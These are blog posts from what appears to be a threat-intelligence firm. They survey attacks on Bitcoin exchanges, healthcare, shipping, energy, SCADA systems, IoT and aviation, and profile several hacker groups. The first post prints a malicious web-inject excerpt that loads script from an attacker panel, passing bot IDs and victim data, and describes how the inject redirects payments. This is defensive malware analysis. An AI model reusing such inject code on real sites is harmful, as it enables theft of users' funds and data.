Bitcoin Exchange Script Injection Vulnerability

Written by Assaf Keren

It is no secret that Bitcoin is under a lot of scrutiny lately.

Bitcoin
Bitcoin

From publicized breaches of Bitcoin trading sites, to wild fluctuations of the its value, the virtual currency that was considered a hot commodity until very recently is floundering. Perhaps the most alarming story demonstrating the instability of this currency is Mount Gox, once the largest Bitcoin exchange in the world. The site first closed, then filed for bankruptcy, and its CEO’s Twitter account was hacked. With all this controversy, the public is left wondering about the future of Bitcoin and  the level of security the exchange site provides. Naturally, hackers have also taken notice and have started looking for breaches on other Bitcoin exchange sites. Alongside the flurry of phishing emails, Bitcoin mining bots and attempts to hack into Bitcon exchange sites, there is a new trend, utilizing the ability of Trojans to hijack http sessions or plain old XSS and CSRF attacks, the attackers are injecting site-specific code to users and then scan for available funds in the user accounts and steal money from the accounts.

Recently, our analysts have come upon four different injection codes, three for Bitcoin exchanges and one for a betting site. All of these are fashioned in the same way,  and are clearly written by the same author.

Below is an excerpt from one of the injections:

S:function(data){
var s = document.createElement(‘script’);
s.type = ‘text/javascript’;
s.async=false;
s.src = “{HERE_ADMIN_URL}/?s=bitcoin&v=2&m=%BOTNET%&b=%BOTID%&t=”+data+”&rnd=”+Math.random();
s.onerror = s.onload = s.onreadystatechange = function(){
if(!this.loaded && (!this.readyState || this.readyState == ‘loaded’ || this.readyState == ‘complete’)){
this.onerror = this.onload = this.onreadystatechange = null;
}
}
if(document.getElementsByTagName(‘head’).length){ document.getElementsByTagName(‘head’)[0].appendChild(s); }else{ document.appendChild(s); }
}

In the continuation of the code, the attackers change the CSS setting of the site, and replace the values of the send-to-address, send-value and the send button elements. All in all, this is a very simple and elegant code that utilizes the context in which it is run.

This is not a new method of attack – it has been widely used in the past and probably will continue to be used in the future. However, it demands a good understanding of how the exchanges work and how they fashion their web services and it is very version-specific. To the exchanges, however, this is bad news since this targeting of the users is something that they have a limited capability to defend against (unlike attacks on their servers).

The process that the exchanges are going through is very similar to what banks and e-commerce services went through when they started providing Internet services. The problem is that banks have the ability, staff and resources (and insurance) to limit transactions and work with customers on fraud cases, while Bitcoin exchanges do not have that kind of capability yet. Even if a specific attack is stopped, we will probably see more and more attacks on Bitcoin (and other currencies) users. This is just one more step in the evolution of crypto-currency to a more mature state.

Cyber Threats to the Healthcare Industry

Written by Gal Landesman

Introduction

The healthcare industry is advancing rapidly, linking systems and medical devices to the Internet, adopting electronic health records and implementing regulatory reforms. Tremendous technological advancements in the medical industry bring with them a greater reliance on software-controlled devices and wireless technologies. These technologies are used in any visit to the doctor and in hospital wards. Many of them connect or have the capability to connect to the Internet. Alongside the opportunities presented, the industry is also a major target for cyberattack, mostly for financial motivationIn the following post, we will present some of the cyber threats currently faced by the healthcare industry.

In today’s environment, organizations are required to take responsibility for securing their networks and computers. Alarming vulnerabilities in medical devices have caused the FDA to issue guidelines for cyber security of the medical device industry. The U.S. Health Information Technology for Economic and Clinical Health Act, for example, permits the fining of hospitals and other organizations up to $1.5 million a year for serious security incidents. Unfortunately, the industry is falling short of complying with said security standards. Last year, for example, the U.S. Department of Health and Human Services’ Office for Civil Rights (OCR) performed a random audit of 20 healthcare organizations, 19 of which failed.

(Note –  this blog post is an excerpt from our report: ”Cyber Threats to the Healthcare Industry”. If you are interested in receiving the full report, please write to: info@sensecy.com).

Threats to the Healthcare Industry

According to security experts, cyber criminals are shifting their focus from the financial industry to the healthcare industry, today an easier and more profitable target. Healthcare records contain valuable information for cyber criminals, such as social security numbers and personal information. Credit card records sell for an average of $2, while medical records can fetch about $20 on the black market. According to the Experian 2014 Data Breach Industry Forecast, the healthcare industry is likely to make the most breach headlines in 2014, despite the fact that 2013 was a year of mega-breaches in the healthcare industry.

Hackers' ransom note, after breaking into a Virginia government website
Hackers’ ransom note, after breaking into a Virginia government website

Identity and Information Theft

Medical identity theft occurs when someone uses an individual’s name and personal identity to fraudulently receive medical services, prescription drugs and goods, or attempts to commit fraudulent billing. Information theft can include the theft of personal information for malicious use, such as selling it on the DarkNet. According to a Ponemon Institute 2013 survey, medical identity theft claimed more than 1.84 million U.S. victims in 2013. Medical identity theft is on the rise in the U.S., where the number of victims in 2013 increased by 19%.

Medical Device Breaching

Over the last 15 years, a growing number of medical devices have become interconnected through hospital networks, the Internet, smartphones and other devices, increasing their vulnerability. This has not escaped the attention of the FDA who recently issued new guidelines to biomedical engineers, healthcare IT and procurement staff, medical device user facilities, hospitals and medical device manufacturers.

The new FDA guidelines came in response to the 2012 findings of a governmental panel that revealed that computerized hospital equipment is increasingly vulnerable to malware infection that can potentially render these devices temporarily inoperable. Many of the devices run on Windows variants. They are interconnected through internal networks to the Internet and are also exposed to laptops in the hospitals, making them vulnerable to malware.

An example of the implications that could be caused by such systems was demonstrated by the medical-device panel from the NIST Information Security & Privacy Advisory Board, who described fetal monitors in intensive-care wards that were slowed down due to malware infection. This problem can affect a wide range of devices, such as compounders, diagnostic equipment, etc.

A report issued by the Government Accountability Office (GAO) warned mostly about vulnerabilities found in wireless implanted defibrillators and insulin pumps, but thousands of other network-connected life-saving devices are also vulnerable. Malware in medical devices is probably much more prevalent than we know, since most of it is not reported to the regulators and there are no records. The OS updating process for medical devices is an onerous regulatory process.

Cyber threats to medical devices (from the GAO report)
Cyber threats to medical devices (from the GAO report)

Conclusion

We believe that the healthcare industry is facing major threats from cyberspace. These threats encompass large areas of the industry and may become a greater burden for it, compromising patient safety, and causing financial and commercial damage to the associated bodies.

SenseCy is coming to town! Come meet us at the RSA USA 2014 conference, February 24-28, in San Francisco.

RedHack – A Turkish Delight

On February 4, 2014, it was reported that members of the RedHack group hacked into the systems of three major telecoms companies: TTNET (Turkey’s largest ISP), Vodafone and Turkcell (the leading mobile phone operator of Turkey). The hackers claim to have obtained large amounts of data, and thus far they have published online information that belongs to Turkish officials and government employees, including names, ID numbers, phone numbers, email addresses and more.

RedHack is a Turkish Marxist–Leninist computer hacker group founded in 1997. The group has claimed responsibility for hacking institutions that include the Council of Higher Education, the Turkish police force, the Turkish Army, Türk Telekom, and the National Intelligence Organization. The group’s core numbers are said to be 12 but the group has hundreds of supporters and over 700,000 followers on Twitter.

RedHack's official Twitter account
RedHack’s official Twitter account

RedHack first made a name for themselves by hacking the Ankara Police Department’s official site in 2012, and later launched a number of attacks against governmental websites, including the Finance and Interior ministries, as well as the Religious Affairs Directorate.

During the last month the group has waged several high-profile attacks against Turkish entities: On January 16, 2014, the group leaked the phone numbers of over 4,000 people who work for Turkcell; On January 15, members of RedHack breached the systems of the General Directorate of the EGO, which serves as the Public Transports Department in Ankara. On January 11, hackers from the group waged several cyber attacks against a number of Turkish organizations, such as the Parliament, the Turkish State Railways, and the Justice and Development Party (AKP).

We believe that in the near future RedHack will continue to focus on attacking official Turkish entities. An interesting observation is their shift from defacing governmental websites to breaching major organizational systems and leaking sensitive information.

Related Posts


Turkish Hacking Group Cyber Warrior’s e-Magazine : TeknoDE on December 18, 2014 by Sheila Dahan

Did Turkish Hackers Actually Hack the Israeli “Iron Dome”? on August 18, 2014 by Sheila Dahan

Turkish Government Bans Twitter and Hijacks IP Addresses for Popular DNS Providers on March 31, 2014 by Sheila Dahan

Cyber Threats to the Shipping Industry

Introduction

Several cyber threats pertaining to the shipping industry have been reported of late, illustrating the vulnerability of this industry – a fact that cyber criminals, terrorists and even hacktivists are already exploiting.

(Please note –  this blog post is an excerpt from our report: “Cyber Threats to the Shipping Industry”. If you are interested in receiving the full report please write to: info@sensecy.com).

Vulnerabilities of Automatic Identification System Exposed

Researchers at the Trend Micro security firm reported they had identified major security breaches in the Automatic Identification System (AIS). The AIS is a global system that identifies and tracks vessels in real time. The system periodically transmits the position, speed and heading of a vessel, among other information. It was mandated by the International Maritime Organization (IMO) in all passenger and commercial vessels over 300 metric tons. During an experiment, the researchers managed to break into the system and alter data in real time.

The researchers were able to spoof the route of a vessel to spell "PWNED", meaning "hacked"
The researchers were able to spoof the route of a vessel to spell “PWNED”, meaning “hacked”

The breach was carried out in two phases:  first they identified the main AIS Internet providers that collect and distribute AIS information, and exploited their vulnerability to manipulated data:

  • Modification of all ship details such as position, course, cargo, flag, speed, name, MMSI (Mobile Maritime Service Identity) status, etc.
  • Creation of fake vessels with the same details, e.g. having an Iranian vessel with nuclear cargo show up off the coast of the U.S.

In the second phase, they exploited flaws in the AIS communication protocol mandatory in hardware transceivers in all vessels. Using a US$200 transceiver (using Marine VHF channels 161.975 MHz and 162.025 MHz) they were able to:

  • Permanently disable the AIS system on a vessel, forcing the ship to stop communicating its position, and also stop receiving AIS notifications from all vessels in the vicinity.
  • Issue a fake CPA alert (Closest Point of Approach) and trigger a collision warning alert.
  • Fake a “man-in-the-water” distress beacon at any location that would also trigger alarms on all nearby vessels.
  • Send false weather information to a vessel, e.g. storm approaching, to route around.
  • Cause all ships to transmit AIS traffic much more frequently than normal, flooding the channel and blocking communications from marine authorities and other vessels in range.

This security breach allows hostile entities to alter the real-time data of vessels sailing the seas, with the potential to cause economic damage, in addition to the serious safety risks to vessels or sabotaging the activities of marine enforcement agencies (police, coastguard etc.). The security gap is particularly worrisome because it does not require expensive equipment or impressive hacking capabilities to utilize it. The threat is that terrorist organizations could exploit this vulnerability, which could lead to serious physical consequences and even the paralysis of maritime traffic in a particular area.

Cyber Attack Breaches Port Security; Container Hijacked

On October 16, 2013, Europol announced it had exposed a network of drug traffickers who recruited hackers to breach IT systems in the port of Antwerp, Belgium. The purpose of the breach was to allow hackers to access secure data giving them the location and security details of containers (that contained smuggled drugs worth billions of dollars), allowing the traffickers to send in truck drivers to steal the cargo before the legitimate owner arrived.

The operation (which took place over a two-year period) went undetected by the port authorities and shipping companies involved. It was apparently uncovered with the recent arrests of members of the “Silk Road” website who sold drugs on the DarkNet in the U.S. The investigation was carried out by a team from Europol that in a related series of raids managed to confiscate containers holding cocaine and heroin worth hundreds of millions of dollars.

KVM devices used in the Antwerp attack
KVM devices used in the Antwerp attack

The breach of the port and shipping companies’ computer systems began with a spear-phishing attack, i.e. sending innocent-looking emails with malicious contents to employees of transportation companies working in the port of Antwerp. When the ring members saw that this channel had become blocked by enhanced IT security, they physically broke into the companies’ offices and installed KVM (keyboard, video and mouse) switches to enable remote access to the computer systems. The KVM switches were assembled and prepared in a professional manner and included miniature PCs concealed inside electrical power strips, external hard drives, as well as keyloggers disguised as USB keyboard port converters. Although some of this equipment was designed simply to steal login credentials, the hackers appear to have used wireless cards to study and possibly control the logistics systems in real time. The group then sent its drivers to the port and provided them with all the necessary certificates and release codes to retrieve the containers.

Cyber Threats to Oil and Gas Industry

Recent years have witnessed an increase in the number of cyber attacks against the energy sector. This sector’s main vulnerability is its reliance on ICS/SCADA systems, which have been causing serious concern for the security community for the past years.

The Oil and Gas Industry is considered privileged targets for different adversaries such as nation-state actors, cyber terrorists, hacktivists and even cyber criminals that sell stolen sensitive data in the underground market. In 2012, for example, energy companies were targeted in 41% of the malware-attack cases reported to the US Department of Homeland Security (DHS). And, vulnerabilities in this industry have skyrocketed 600% since 2010, according to data reported in an NSS Labs’ Vulnerability Threat Report.

Here are some examples of significant attacks pertaining to the energy sector:

State-Sponsored

In August 2012, Saudi Aramco was hit by a computer virus that wiped data from 30,000 computers. Although the attack did not have an impact on the oil production, it disrupted Saudi Aramco’s internal communications. The virus, termed ‘Shamoon’, was inserted to the company’s network via a USB stick. The US government has blamed Iran for the attack, and the Secretary of Defense Leon Panetta stated that it was “probably the most destructive attack that the private sector has seen to date”.

Hacktivism

On June 20, 2013, the hacktivist collective Anonymous launched a cyber operation dubbed #OpPetrol planned to target various oil companies around the world. The operation was not a success, but it emphasized the fact that the oil and gas industry represents an attractive target for attackers with different agendas and motivations, including sabotage, cyber espionage, financial, political, and more.

OpPetrol_2

Terrorist Groups

In Tunisia the hacker group Tunisian Cyber Army (TCA) is joining forces with the Electronic Army of al-Qaeda (AQEA). The groups had already carried out cyber attacks against Western targets and they definitely pose an emerging threat in the cyber domain.

Conclusion

We believe that the threat to the Oil and Gas industry will grow in the near future, as the hunt for vulnerabilities in SCADA systems has increased. A couple of weeks ago it was reported that Kaspersky experts discovered a java version of Icefog espionage campaign that targeted at least three US oil and gas companies. According to Symantec, the energy sector was the second most targeted vertical in the last six months of 2012, with only the government/public sector exceeding it with 25.4 percent of all attacks. With millions of threats of varying complexity experienced by the industry on weekly basis, it is not surprising that by 2018 the oil and gas industry will be spending up to $1.87 billion on cyber security.

Targeting SCADA Systems

Introduction

Recent years have witnessed an increased awareness within the worldwide security community of risks related to cyber attacks against critical infrastructures. ICS/SCADA systems have been a particular cause of concern for the security community, owing to Stuxnet, Flame and other cyber threats. As automation continues to evolve and assumes a more important role worldwide, the use of ICS/SCADA systems is likely to increase accordingly.

In this post I would like to present an analysis of several cyber incidents pertaining to ICS/SCADA systems and originating from threat elements in the Middle East.

Iranian Hacker Group Implicates itself in Physical Attack on Electric Power Facility

On January 2, 2014, the Cryptome.org website (a digital library host) published a message from the Iranian hacker group Parastoo, directed at the American authorities. The message headline connects the group to a “military-style” attack on an electric power station, the PG&E Metcalf substation, in California, U.S.A. on April 16, 2013. The connection to the Iranian group is unclear, despite the fact that Parastoo has mentioned that it has been testing national critical infrastructures using cyber vectors.

Cryptome message
Cryptome message

On April 16, 2013, an undetermined number of individuals breached the PG&E Metcalf power substation in California and cut the fiber-optic cables in the area around the station. The act neutralized some local 911 services and temporarily disrupted cell phone service in the area. The perpetrators also fired shots from high-powered rifles at several transformers in the facility. Ten were damaged and several others shut down.

It should be noted that there have been several attacks against different infrastructure facilities in the U.S. in the past year, such as the Arkansas power grid. Furthermore, officials conceded that the electric power industry is focusing on the threat of cyber attacks.

About Parastoo

The Iranian hacker group Parastoo first emerged on November 25, 2012, when they posted a message announcing they hacked into the International Atomic Energy Agency (IAEA) and leaked personal details of its officials. In February 2013, Parastoo claimed to have stolen nuclear information, credit card information, and the personal identities of thousands of customers, including individuals associated with the U.S. military, that work with IHS Inc., a global information and analytics provider.

The Syrian Electronic Army Hacks into Israeli SCADA Systems

On May 6, 2013 the cryptome.org website reported a successful attack by the “Syrian Electronic Army” (SEA) on a strategic Israel infrastructure system in Haifa. In an email sent to the website, the attack was declared to be a warning to decision-makers in Israel, evoking alleged Israeli Air Force (IAF) attacks on Syrian territory at the beginning of May 2013. The claim of responsibility for the attack was accompanied by a .pdf file with screenshots substantiating the cyber attack.

Examination of the screenshots proved that the attack was authentic, but was not aimed at a Critical National Infrastructure (CNI) like the municipal water SCADA system in Haifa. Our research did, however, reveal that the attackers had targeted the irrigation control system of Kibbutz Sa’ar, near Nahariya. Control of this system would present the hacker with numerous capabilities, among which is the destruction of the agricultural yield.

Screenshot from the PDF released by the attackers
Screenshot from the PDF released by the attackers

We also noticed that the time shown on the screenshot indicated the end of April 2012. It is possible that the system clock was incorrectly set, but it is more likely that the system was breached a year ago and the published “Retaliatory Strike” was retained as a contingency plan for exactly such an attack by Israel.

The Syrian Electronic Army posted a denial via its Twitter account, where it stated that it was not behind the attack. On other occasions, this Twitter account has been used as a platform for claims of responsibility, but with this incident, the above attack is not mentioned, neither here nor on the group’s official website or forums (apart from the denial). It should be noted that there are numerous examples of fictitious claims of responsibility intended to deflect identification of the attacker MO (Modus Operandi) of state-sponsored hacker groups.

SEA denial on their Twitter account
SEA denial on their Twitter account

This incidence is another link in a chain of events demonstrating an impressive ability to locate and exploit SCADA systems that appear to be susceptible to the Muslim hackers’ skills. However, in our view, this event is unprecedented. For the first time in public, a critical computerized infrastructure facility on Israeli soil has been attacked, and it is extremely likely that a sovereign state is behind the attack, declaring outright war in the cyber arena and deviating from the intelligence-gathering plateau.

Jihadist Cyber Terror Group to Target SCADA Systems

On June 11, 2011, a prominent Web Jihadist from the Shumukh al-Islam forum, Yaman Mukhaddab, launched a campaign to recruit male and female volunteers for a new Electronic Jihad group. The campaign, which takes place over the thread itself, begins with a clear definition of the group’s tasks and priorities. Mukhaddab says:

Simply put, it is a cyber-terror base, for launching electronic terror attacks on major infidel powers, specifically the U.S., the U.K. and France, no others. This base is not going to attack, for instance, the sites of Shi’a, Christians, apostates, slanderers, liar sites and forums or anything else. I repeat: it will only target the U.S., the U.K. and France.

Mukhaddab goes on to list the main targets for future attacks. SCADA systems are ranked as a top priority target, in order to “destroy power, water and gas supply lines, airports, railway stations, underground train stations, as well as central command and control systems” in these three countries. The second priority includes control systems of general financial sites, such as central savings organizations, stock markets and major banks. Third on the group’s agenda are websites and databases of major corporations dominating the economies of these countries, while fourth and last are less specified “public sites affecting the daily routine of citizens, in order to maximize the terror effects on the population”.

Mukhaddab details the desired skills of anyone wishing to join the group, including: thorough understanding of SCADA systems, preferably with experience in hacking them; acquaintance with writing hacking programs and scripts, and programming in C, C+ and C++ languages; expertise in networks, communication protocols and various kinds of routers and firewalls, specifically mentioning CISCO; Expertise in Linux or Unix operating systems; expertise in Windows operating system; capability of detecting security vulnerabilities; acquaintance with hacker websites, capability of entering them easily, searching for required scripts, tools, or software, and providing them to fellow members, if asked to; complete mastery of English or French scientific language, and scientific background in computer engineering; mastery of the Russian language; and mastery of the Chinese language. Members who want to volunteer are asked to post a response in the thread, specifying the categories that fit their capabilities.

To date, close to a hundred volunteers have already signed on to Mukhaddab’s Electronic Jihad group. We have yet to see indications that this newly formed group has started to engage in online hacking activity, but given the enthusiasm it created among forum members, this is likely to occur in the near future.

Related Posts:


Cybercriminals Target iOS Devices April 28, 2014 by Tanya Koyfman

Cyber Threats to a Bank – Part 1: Cybercriminals Target Financial Institutions November 27, 2014 by Tanya Koyfman

AnonGhost Targets Universities around the World December 4, 2014 by CyInfo

Cyber Criminals “TARGET” Point of Sale Devices  January 15, 2014 by assafkeren

Cyber Security – Not Just Another Buzzword

The technology industry loves buzzwords, and its offspring, the IT industry, is no different: “Cloud computing”, “Big data”, “Analytics”, “XX-As-a-Service (XaaS)”… it seems that some marketing wizard invents a new phrase and almost instantly the industry adopts it and uses it to such an extent that within months it has become a trend, and everybody follows suit, adapting their offerings accordingly. Then comes the day when somebody else invents a new, sexier phrase, and everything shifts again. Most of the time it is hard to assess whether the new trend is actually meaningful as such and will establish itself as mainstream or even core of technology, or is it simply being delighted in as a novelty, soon to be forgotten? The side effect of this cycle is that people in the industry are tiring of buzzwords and are becoming more and more skeptical when “The new, innovative concept” is marketed to them. The general public is even less interested – most only care about new technologies and concepts when they have been proven and incorporated into fully productized gadgets and applications.

And now, following the widely publicized breaches of large retail chains, everyone is talking about Cyber Security, and the question arises – is this just one more buzzword?  Not at all, but some mistake it to be so, for several reasons.

First of all, although it appears to be a very young industry, cyber security is not new at all. In fact, it has been incorporated into our lives for over two decades, but under different names – information security, anti-virus etc.

Secondly, it is not a single-faceted industry but a very diverse one comprising older segments – encryption, anti-virus, firewall etc., as well as newer ones: mobile, biometric identification and intelligence.

Although many startups are developing new products, the market as a whole is mature and profitable. The general notion is that cyber companies are run by 20-something-year-olds in their garages, while in fact the young enterprises are fully seeded companies with solid business plans, and the larger companies are huge multinationals (and since the market is consolidating, there are now fewer but much larger players).

So why is it that this vast industry appears so young that it can be mistaken for a passing trend?

In absolute terms, it is relatively young – established in the 1980’s (although by technology standards it can be considered old, much older than the mobile or cloud technologies that it protects today). Also, up until the latest “rebranding”, it was not something most people noticed. IT security sounds boring, and because everything functioned smoothly, no-one worried about how the encryption worked or how viruses were stopped. Fast-forward to today and every news item seems to be entangled in cyber: Snowden and the NSA, the Adobe breach, the Target breach, the international arms race between the U.S., China and Russia – all involve cyber. And since the adoption of Internet and mobile technology, we are all much more exposed to the threat emanating from this world – be it the theft of our personal details or the monitoring of our online activities by various entities. And here’s the good part – the industry is not idle. In fact, it acknowledges the need to evolve to mitigate evolving threats and it is doing so at an extremely rapid pace, trying to come up with solutions for securing things that were not even dreamed of when the first anti-virus was developed. So no, this whole “Cyber” thing is definitely not just another trend. It is here to stay and will accompany us for many years to come. And that is a good thing – since the cybercriminals of the world are DEFINITELY here to stay.

Will Your Toaster Attack You?

Lately, we have been hearing an awful lot about the Internet of Things (IoT).

What this buzzword describes is a world where every device is connected to the Web and communicates with other devices, and us humans, usually via Smartphone interface.

And, to a certain extent, this is an everyday reality, even today – smart TVs, printers, thermostats, and other home appliances are connected to the Web via wireless communication and receive orders from their owners who are often miles away. And, sure enough, this trend has not been overlooked by hackers.

Since each such device now has a unique IP address, Internet connectivity and the ability to send and receive packets of information, hackers can (in theory) connect them, infect them with malware and use them to send traffic – basically anything that can be performed with a regular PC. An evidence that such schemes are being planned and implemented is growing rapidly.

Security research firm Proofpoint recently announced  that they discovered that hackers broke into more than 100,000 gadgets – including TVs, multimedia centers, routers, and at least one fridge – and used the appliances to send out more than 750,000 malicious emails between December 23, 2013 and January 6, 2014 (I guess asking for a Smart TV for Christmas wasn’t such a good idea after all…).

So, while the (now-growing) popular belief is that such appliances can be hacked, tinkered with and turned into malicious machines attacking their human masters is not true, it is very likely that they will be used for all kinds of cyber crime, from sending SPAM, spreading malicious files or participating in DDoS attacks (these are, after all, robots).

Will these appliances attack you?
Will these appliances attack you anytime soon?

Even more interesting are the discussions on various communication platforms regarding the possibilities presented by this trend. References to the above incident were found in Arab media and also on the Facebook page of the famous “Alkrsan” hacker forum. The latter may indicate a rising interest among Arab hackers for this method of cyber-attack.

Reference to IoT hacking at the famous hackers' forum "Alkrsan"
Reference to IoT hacking on the famous hacker forum “Alkrsan”

As for the Russian-speaking Internet, the HabrHabr computer blog published a post entitled “a botnet consisting of ‘smart’ TVs, media centers, PCs and … refrigerators was discovered”.

Generally, news sites refer to this affair as an evolving new threat in the cyber world and lively discussions are being held on closed forums regarding the trend.

Russian computers blog HabrHabr  discusses  IoT hacking
Russian computer blog HabrHabr discusses IoT hacking

So, will your toaster turn against you anytime soon? Not likely. But we have every reason to believe that any device that can be hacked is a legitimate target for hackers and will be breached sooner or later, changing the “Internet of Things” into the “Internet of Vulnerabilities”.

Cyber Threats to the Aviation Industry

The aviation industry faces major risks on all of its fronts: from the air traffic control systems, to the aircraft themselves, to the airline companies and airports and border crossings. The identified threats stem from the current nature of aviation industry systems, which are interconnected and interdependent.

(Please note –  this blog post is an excerpt from our report: “Cyber Threats to the Aviation Industry”. If you are interested in receiving the full report please write to: info@sensecy.com)

On August 13, 2013, the AIAA officially released a Decision Paper entitled “A Framework for Aviation Cyber security”, outlining existing and evolving cyber threats to the commercial aviation enterprise and noting the lack of international agreement on cyber security in aviation. There is no common overall coordination of efforts seeking a global solution.

According to the report, the global aviation system is a potential target for a large-scale cyber attack with attackers focusing on malicious intent, information theft, profit, “hacktivism”, nation states, etc.

Aviation

The risks are not only theoretical. As portrayed below, some of the aforementioned security concerns have already been realized by hackers in real-life.

  • A presentation at the ‘Hack in The Box’ security summit in Amsterdam in April 2013 has demonstrated that it is possible to take control of an aircraft’s flight systems and communications using an Android smartphone.
  • Sykipot is a tool that serves as a backdoor that an attacker can use to execute commands on the affected system. It is being used to gather intelligence about the civil aviation sector in the U.S. Like most targeted attacks, Sykipot infects using spear-phishing techniques by sending emails with malicious attachments. Lately, as identified by Trend Micro, Sykipot has been observed gathering intelligence on the U.S. civil aviation sector. The intentions of this campaign are unclear as yet. Sykipot has a history of targeting U.S. Defense Initial Base (DIB) and key industries over the past six years.
  • Conficker, a worm that has infected millions of computers worldwide, infected the French Navy network on 2009, forcing it to cut connectivity to stop it from spreading, and to ground its Rafale fighter jets. It was probably introduced through an infected USB drive.
  • In 2008, Spanair flight 5022 crashed just after take-off, killing 154 people. According to the Spanish government’s Civil Aviation Accident and Incident Investigation Commission (CIAIAC), the disaster occurred because the central computer system used for monitoring technical problems in the aircraft was infected with a Trojan horse.
  • In 2008, the FAA reported that the computer network in the Boeing 787 Dreamliner’s passenger compartment was connected to the aircraft’s control, navigation and communication systems – a cause for grave security concern. This connection renders the plane control system vulnerable to cyber attack. Boeing advised that they would address the issue
Aviation sector under threat of cyber attacks

We believe that the aviation industry is facing major threats from cyberspace and these threats encompass large areas of the industry and may become a greater burden for it, compromising the safety of the passengers, and causing financial and commercial damage to the associated companies.

What Does “Cyber Intelligence” Mean, And Why Is It Needed?

Hi All,

SenseCy Blog has been up and running for a week now and we are extremely happy with the traction we’ve achieved so far.

Its time to elaborate about what we mean when we say “Cyber intelligence”.

As far as cyber defense goes, organizations have traditionally relied on technology and procedures to mitigate cyber threats.

But as recent events show, this thinking is no longer valid. Without knowing what threats are out there, and who is targeting them, organizations find it impossible to tweak their defensive mechanism and procedures and fail time and again to secure their data from breaches.

So what attributes one must look for in cyber intelligence services?

  • Up-to-date intelligence needs to be on-time, relevant and accurate, based on the needs of a specific organization.
  • Derived from research sources, including Deep Web, open-source, closed groups and password-protected forums (this is where the real information resides), covering multiple languages.
  • A mixture of both technical and operational intelligence (not just “Another variant of malware was detected”)
  • “Analyst approved” intelligence, meaning that information has been correlated, aggregated and analyzed from leading to near-zero false positives.
  • Have operational value – “What do I do next?” question answered.
Example of operational intelligence derived from password-protected groups

With such intelligence at its disposal, the organization could better mitigate evolving threats and achieve much greater efficiency and effectiveness from its technology.  

In future posts, we will explore the production and analysis aspects of Cyber Intelligence and show some real-life examples of our work.

Keep in touch!

The SenseCy Team